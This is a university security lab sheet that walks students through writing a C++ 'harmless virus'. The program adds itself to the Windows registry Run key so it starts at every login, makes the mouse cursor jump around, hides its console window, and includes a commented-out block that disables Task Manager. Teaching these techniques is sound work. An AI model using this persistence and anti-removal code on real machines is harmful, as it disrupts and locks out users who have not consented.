Page 1 of 8

CO1508 Computer Systems & Security – Week 10

Building your harmless virus in C++ – Part 1 Windows Registry

Summary
You are going to explore Windows Registry and learn how to make an application starts
every time the computer is powered on. After that, you are going to build a C++ programme
that will infect Windows Registry to start every time the machine starts and make the
mouse go crazy. It’s your little harmless virus!

Note
The C++ code in this lab sheet might contains errors and/or bugs. This is done on purpose.
One of the main aims of this practice is getting you to find out solutions and debug your
code carefully. Don’t worry, when you’re stuck, your lab tutor will help.

Activities

1. Windows Registry

From Start menu à Type Run à Enter. In the Run window, type regedit. Click Yes.
As we discussed during the lecture, Windows registry is a central database for system and
software configurations on Windows machine. You’ll learn a trick to start an application
every time the machine is powered on.
Go to the following location:
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
What can you see there? How many strings are there?

Now, right click in the empty space and choose New à String Value à MyValue. Right click
on MyValue and choose modify (or simply double click on MyValue). In the Value Data field,
put this: “C:\Windows\System32\mspaint.exe” (yes including the double quotations).
Now, restart your machine and watch the result.
If everything works correctly, Paint should start automatically.
Why is this important? Can you think of a good use and a bad use of this feature?

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 2 of 8

2. Create Visual Studio C++ Project

Open Visual Studio and create a new “Windows Console Application” under Visual C++
project named “Week10-RegVirus”.

3. Windows Registry API

Registry key values can be edited using regedit, as you already did in section 1. Another way
of editing registry keys is an API system library in Windows called winreg.h
Here, you can find all the functions provided by this library:
https://docs.microsoft.com/en-us/windows/desktop/api/winreg/
Examples of these functions are:
RegCloseKey RegOpenKey

RegConnectRegistry RegOpenKeyEx

RegCreateKey RegQueryInfoKey

RegCreateKeyEx RegQueryMultipleValues

You’ve to spend some time reading about these functions and understanding how it works
and why you might need to use them. This is important for your assignment because you
should be able to answer any question about any line of code. This is also important for this
lab sheet so you can fix any bug in the code below.

We’ll do a Hello Registry exercise at the beginning to get you going "
% However, before
$
#
diving into code details, you’ve to remember these steps to change a registry key value
through a C++ programme:
• Open the key you want to edit
• Edit the value
• Close the key (this is very important because otherwise the value won’t be written)

In the code below, I’ll assume that you can refer to the link above (about winreg.h) to
understand registry editing functions. I’ll only explain system functions when necessary.
Again, you’ve to spend some time reading/understanding the main functions in winreg.h.

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 3 of 8

4. Windows Registry – Handle to Key (HKEY)

In Section 1, we created a new entry to make Paint starts every time we start the machine.
We’ll do the same now but using C++. Write the following code into your C++ project:
#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;

int main()
{
HKEY RunKey;
LPCTSTR valueP = TEXT("CO1508");
char* data = "C:\\WINDOWS\\system32\\mspaint.exe";
if (RegOpenKey(HKEY_CURRENT_USER,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\RUN"), &RunKey) !=
ERROR_SUCCESS)
{
cout << "Unable to open registry key. Exit.\n";
return 0;
}

if (RegSetValueEx(RunKey, valueP, 0, REG_SZ, (LPBYTE)data,

strlen(data)*sizeof(TCHAR)) != ERROR_SUCCESS)
{
RegCloseKey(RunKey);
cout << "Unable to set the registry value. Exit.\n";
return 0;
}
else
{
RegCloseKey(RunKey);
cout << "Registry value is successfully set!\n";
MessageBox(NULL, L"You're infected :-) I dare you to restart
your machine!", L"Infection", MB_OKCANCEL);
}
return 0;
}

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 4 of 8

Now, build and run. Open the registry again and check the values in Run. Did it work? Do
you see anything strange there? Clearly, the code worked but didn’t set the value correctly.
Try to fix the code. Hint: check the parameters types.

Once it’s fixed, build and run again. It should have the correct value in Run. Once it’s there,
save your work, restart your machine and check if MS paint will start automatically.
If you’re stuck, ask your lab tutor for help. Try to find the solution yourself first!

5. Windows Registry – Crazy Mouse

So far, you learnt how to open a registry key and write a new value in Run. Now, let’s try to
write a programme that will make the mouse go crazy. In the same project, add the
following code to your previous one. Remember, put it before return 0 at the end!
while (1)
{
srand(time(NULL));
POINT point;
GetCursorPos(&point);
for (int i = 0; i < 500000; i++)
{
// set x and y coordinates randomly
point.x = rand() % 2000;
point.y = rand() % 2000;
}
SetCursorPos(point.x, point.y);
}
return 0;

Now, build and run. Click ok when you see the infection message. Now, I dare you to control
your mouse!!! J

Don’t worry, you can press “Alt+Ctrl+Del” to get Windows task manager and kill the exe file
to stop this madness. (Don’t end Visual studio task!) If you can’t control the mouse to get to
Task manager, use Alt+F4 on keyboard to close the console window.

Try to run the code again but this time, use the keyboard to close the console window (use
Alt+F4). It looks that our crazy mouse virus is weak and vulnerable to these two methods!

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 5 of 8

(Windows Task Manager or Alt+F4). We’ll learn how to hide the console window, so it’ll be
more difficult to stop it!!! But first, read the explanation of the new functions used above:

• srand(time(NULL)) initialises the pseudo random number generator with a value

time(NULL), which returns the current calendar time from the system.

• POINT this class represents an x-y coordinate point on a two-dimensional integer grid.
• GetCursorPos(&point) retrieves the position of the mouse cursor, in screen

coordinates and point the value in &point.

• SetCursorPos(point.x, point.y) sets the mouse cursor to the specified

coordinates on the screen.

6. Hide the Console Window

Add the following the code in red to your while loop:

while (1)
{
srand(time(NULL));
HWND hwnd = GetConsoleWindow();
POINT point;
GetCursorPos(&point);
ShowWindow(hwnd, SW_HIDE);
for (int i = 0; i < 500000; i++)
{
point.x = rand() % 2000;
point.y = rand() % 2000;
}
SetCursorPos(point.x, point.y);
}

Now, build and run. The console window will disappear. You can use task manger to stop it
by expanding Visual Studio and you’ll find it there Week10-RegVirus.exe J You might have
to use the keyboard if your mouse is still crazy!

• GetConsoleWindow()retrieves the window handle used by the console associated

with the calling process.

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 6 of 8

• showWindow() sets the specified window show state. Check the parameters’ values
here https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-
showwindow

7. Windows Registry – Register Yourself to Run Every Time

We want to register the exe file of our virus, so it runs every time the machine runs. I’ll post
the full code here so you’ve the full picture now. The code contains all the pieces from all
the sections in this lab sheet.
Note the code in red is the new added pieces to register the exe file into the Run key.

#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;

int main()
{
HKEY RunKey, SysKey;
DWORD dwData = 1;
LPCTSTR valueP = TEXT("CO1508");
LPCTSTR valueV = TEXT("Virus");
LPCTSTR data = TEXT("C:\\WINDOWS\\system32\\mspaint.exe");
TCHAR VPath[MAX_PATH + 1];

GetModuleFileName(NULL, VPath, MAX_PATH);

if (RegOpenKey(HKEY_CURRENT_USER,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\RUN"), &RunKey) !=
ERROR_SUCCESS)
{
cout << "Unable to open registry key. Exit.\n";
return 0;
}

LONG PaintRun = RegSetValueEx(RunKey, valueP, 0, REG_SZ,

(LPBYTE)data, lstrlen(data) * sizeof(TCHAR));
LONG RegVirusRun = RegSetValueEx(RunKey, valueV, 0, REG_SZ,
(LPBYTE)VPath, lstrlen(VPath) * sizeof(TCHAR));

if (PaintRun || RegVirusRun)
{

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 7 of 8

RegCloseKey(RunKey);
cout << "Unable to set the registry value. Exit.\n";
return 0;
}
else
{
RegCloseKey(RunKey);
cout << "Registry value is successfully set!\n";
MessageBox(NULL, L"You're infected :-) I dare you to restart
your machine!", L"Infection", MB_OKCANCEL);
}

/*
LONG openRes =
RegCreateKeyEx(HKEY_CURRENT_USER,L"Software\\Microsoft\\Windows\\Curr
entVersion\\Policies\\System",
0, NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,
NULL,&SysKey,NULL);

if (openRes)
{
cout << "Error" << openRes << "\n";
return 0;
}

RegSetValueEx(SysKey, L"DisableTaskMgr", 0,
REG_DWORD, (LPBYTE)&dwData, sizeof(DWORD));
RegCloseKey(SysKey);
*/

while (1)
{
srand(time(NULL));
HWND hwnd = GetConsoleWindow();
POINT point;
GetCursorPos(&point);
ShowWindow(hwnd, SW_HIDE);

for (int i = 0; i < 500000; i++)

{
point.x = rand() % 2000;
point.y = rand() % 2000;
}

SetCursorPos(point.x, point.y);
}

return 0;
}

Now, build and run. Restart your machine and see what will happen.

CO1508 Computer Systems and Security, UCLAN – 2019-2020

 Page 8 of 8

Back to the code, the only new function in this code is GetModuleFileName(NULL, VPath,
MAX_PATH).
It retrieves the fully qualified path for the file that contains the specified module. The
module must have been loaded by the current process. You can read about the parameters
here: https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-
getmodulefilenamea
Can you figure out why did we use MAX_PATH? Find the answer.

8. The Assignment – Start now with these tasks

Now, you should be able to start your assignment. You’ve been given the basics to do the
registry virus and manipulate registry values. In the time left in this lab, try to do the
following tasks in C++:
• Find out how to read a key from the registry and display its value on screen
• Find out how to delete a specific registry value or key
• Find out how to access a path on the hard disk and delete that file you found in the
registry key.

Finally, remember that you have to understand every line of code you’re writing. You’ll be
asked during the demo of your assignment. Therefore, don’t just copy/paste stuff.

CO1508 Computer Systems and Security, UCLAN – 2019-2020